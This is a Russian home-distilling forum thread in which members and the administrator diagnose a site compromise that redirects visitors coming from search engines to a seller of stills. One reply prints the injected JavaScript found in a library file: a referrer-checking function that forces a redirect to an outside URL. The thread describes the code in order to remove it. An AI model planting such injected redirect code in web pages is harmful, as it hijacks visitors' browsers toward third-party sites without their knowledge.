На сайте вирус!

Форум самогонщиков, пивоваров, виноделов Технический Работа сайта и форума
1 2 3 2
ys1797 Доктор наук Санкт-Петербург 871 217
Отв.20  22 Дек. 14, 13:37

Вчера была точно в Firefox, через view source открыл
<script type="text/javascript" src="http://www.homedistiller.ru/js/highslide/highslide-with-html.packed.js"></script>
Но он вчера располагался до jquery.min.js, а сегодня после него.
Так-что точно что-то менялось или это тестировалась первоапрельская шутка Улыбающийся

Сама R() была явно вписана ручками, боты так акуратно не вписывают Улыбающийся
ванечка Научный сотрудник в деревне 1029 332
Отв.21  22 Дек. 14, 14:06, через 30 мин
было дело несколько раз. через поиск в гуле по картинкам
с запросом вида *** site:forum.homedistiller.ru
переход по картинке редиректит на совершенно левый сайт с продажей самогонных аппаратов

Андрей это ты сейчас с кодом сайта ковыряешься? лагает жутко с загрузкой страниц
или ошибка
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again
later.
nstorm Научный сотрудник Ростов-на-Дону 3038 2418
Отв.22  22 Дек. 14, 14:12, через 6 мин
Сама R() была явно вписана ручками, боты так акуратно не вписывают Улыбающийсяys1797, 22 Дек. 14, 13:37
Бывает вписывают. Видел сам аналоичное, когда бот после комментариев в шапке, но до реального кода вписывал свой.

лагает жутко с загрузкой страниц
или ошибкаванечка, 22 Дек. 14, 14:06
Это похоже просто перегружен сайт, людей много.
Андрей Администратор Бухарест 3207 3451
Отв.23  22 Дек. 14, 15:26
У кого-то может старый highslide-with-html.packed.js закеширован был.
Поэтому и вчера еще можно было видеть модифицированный файл.

Как бы понять каким образом файлы модифицируют?
Лог анализировать очень тяжело с такой большой посещаемостью.

ванечка, сервер скорее всего перегружен.
а у тебя давно такая переадресация первый, а так же последний раз была?
ванечка Научный сотрудник в деревне 1029 332
Отв.24  22 Дек. 14, 15:41, через 16 мин
Андрей, точно по дням не скажу. но раза три такое было в последнее время.
в принципе не сильно напрягает так как длятся непродолжительно. просто нериятно когда сообщение хочешь отправить и не можешь.
если будет повторяться я тебе в личку или на почту отправлю. день и время.

дня три назад когда такая байда приключилась пришлось полностью снести (с подчисткой) firefox
и установить по новой свежескачанную с офф сайта версию. до этого только обновлял.
из дополнений адблок установлен.
nstorm Научный сотрудник Ростов-на-Дону 3038 2418
Отв.25  22 Дек. 14, 16:37, через 57 мин
Как бы понять каким образом файлы модифицируют?
Лог анализировать очень тяжело с такой большой посещаемостью.Андрей, 22 Дек. 14, 15:26
Часто через баги движков (форум, cms) подгружают всё-таки shell сначала или дроппер на php, а уже потом через них меняют код под себя. Обычно при таких ситуациях находятся "левые" скрипты с рандомными именами.
Еще есть вариант - дыра у хостера и неправильные права на файл (другой клиент скриптом заливает в чужие файлы свой код), но это если шаред шостинг.
Ну и логи через парсеры можно пропустить, чтобы оставить только подозрительное. Тот же logwatch хотя бы для начала.

PS: я не большой эксперт в этой области, на основе опыта личого рассказываю с чем сталкивался.
stoilisto50 Доктор наук Новосибирск 659 408
Отв.26  22 Дек. 14, 17:49
Только что зашел через iPad через поисковик Google и меня вместо на форум выкинуло на какие-то самогонные аппараты из Германии... Samo-gon. org.  Непонимающий??
Андрей Администратор Бухарест 3207 3451
Отв.27  22 Дек. 14, 18:13, через 24 мин
stoilisto50, а на компе или ноуте можешь зайти? Я хочу чтобы кто-нибудь сохранил такую страницу и прислал, чтобы посмотреть ее код, а на айпаде не знаю можно ли сохранять, как на компе. Главное, чтобы кэш не обновился раньше времени Улыбающийся
nstorm Научный сотрудник Ростов-на-Дону 3038 2418
Отв.28  22 Дек. 14, 18:39, через 26 мин
Андрей - опять появилась функция R() в файле http://www.homedistiller.ru/...-html.packed.js. Обновил прямо сейчас. Вот, чистая консоль Linux:
$ cd /tmp && wget -S http://www.homedistiller.ru/js/highslide/highslide-with-html.packed.js
--2014-12-22 18:34:58--  http://www.homedistiller.ru/js/highslide/highslide-with-html.packed.js
Распознаётся www.homedistiller.ru... 94.228.195.231
Устанавливается соединение с www.homedistiller.ru|94.228.195.231|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ...
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 22 Dec 2014 15:35:01 GMT
  Content-Type: application/x-javascript
  Content-Length: 35306
  Last-Modified: Sun, 21 Apr 2013 13:06:42 GMT
  Connection: keep-alive
  Keep-Alive: timeout=20
  Expires: Wed, 21 Jan 2015 15:35:01 GMT
  Cache-Control: max-age=2592000
  Accept-Ranges: bytes
Длина: 35306 (34K) [application/x-javascript]
Saving to: «highslide-with-html.packed.js»

100%[===================================================================================================================================================================================================================================================================================>] 35 306      --.-K/s   в 0,06s

2014-12-22 18:34:58 (595 KB/s) - «highslide-with-html.packed.js» saved [35306/35306]

$ cat highslide-with-html.packed.js | head -n 9
/**
 * Name:    Highslide JS
 * Version: 4.1.12 (2011-03-28)
 * Config:  default +inline +ajax +iframe +flash +packed
 * Author:  Torstein Hønsi
 * Support: www.highslide.com/support
 * License: www.highslide.com/#license
 */
function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.mail.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://androidex.ru/orphus/tea.php"</s'+'cript>')}else{document.write('.')}}R();eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
-=Дальше вырезал код=-

Еще могу посоветовать посмотреть дату модификации этого файла на сервере по FTP и искать в логах что было в это время. Ну и ес-но проверить на наличие подозрительных файлов в папке с данными сайта + обновить версию движка форума и CMS.

EDIT: Я даже кажется нашел, кто этот "код" редиректа напилил: h t t p : / / forum.antichat.ru/showthread.php?p=3485740
ys1797 Доктор наук Санкт-Петербург 871 217
Отв.29  22 Дек. 14, 19:16, через 38 мин
Андрей,
Во!
Появляется так:
1. Выходим из аккаунта.
2. Чистим куки
3. Открываем http://forum.homedistiller.ru
Видим точку.

А можно еще проще - переключиться в отображении не "тему по умолчанию" и видим точку.
nstorm Научный сотрудник Ростов-на-Дону 3038 2418
Отв.30  22 Дек. 14, 21:13
Сейчас к слову снова чистый файл.
Андрей Администратор Бухарест 3207 3451
Отв.31  23 Дек. 14, 10:32
Кое-что сделал, посмотрим как дальше дело пойдет.
DюDя Доктор наук Питер 844 192
Отв.32  23 Дек. 14, 12:02
На той неделе тоже при вхождении на сайт выпадало окошко "полечиться"
О!Набрал сайт в хроме через поисковик "гугл" - появилось окошко самогонный аппарат бавария,,
зашел в хроме через яндекс - все нормально.
Попробовал в опере через гугл - нормально.

и еще время на сайте на час опережает реальное
wasshal Специалист Оленегорск 151 20
Отв.33  23 Дек. 14, 12:46, через 45 мин
При попытке сохранить файл с сайта отправляет на хомедистиле, сохранить как пытается сохранить файл  YES)_png
Андрей Администратор Бухарест 3207 3451
Отв.34  23 Дек. 14, 13:19, через 34 мин
DюDя, у тебя видимо еще в кеше старая версия файла. Для чистоты эксперимента надо удалить все куки и попробовать еще раз. Сможешь? Улыбающийся
DюDя Доктор наук Питер 844 192
Отв.35  23 Дек. 14, 16:34
Андрей,удалИли куки и пропали глюки)спасибо
а время все равно не совпадает
POLE Научный сотрудник Питер 2013 767
Отв.36  23 Дек. 14, 18:47
Похоже на кибер атаку с подставой гугла и сайтов других иностранных винокуров и пр))))Хотят разозлить творческих людей)))
Витaля Кандидат наук Орск Оренбургская обл. 435 115
Отв.37  23 Дек. 14, 20:04
2 дня не мог зайти через поисковик гугл вылетает дистиллят из Германии пришлось скопировать адрес и зайти.
nstorm Научный сотрудник Ростов-на-Дону 3038 2418
Отв.38  23 Дек. 14, 20:30, через 27 мин
а время все равно не совпадаетDюDя, 23 Дек. 14, 15:34
Дык часовые пояса разные бывают. Профиль->Внешний вид->Часовой пояс (Количество часов +/- к времени сервера.) прописать -1 для московского часового пояса и будет всё ок.
Андрей Администратор Бухарест 3207 3451
Отв.39  23 Дек. 14, 20:39, через 9 мин
На форуме неправильное время так же стояло.
Надо было обновить файлы временных зон и на сервере и в php.
Сделал, а то всё забывал или возможности не было.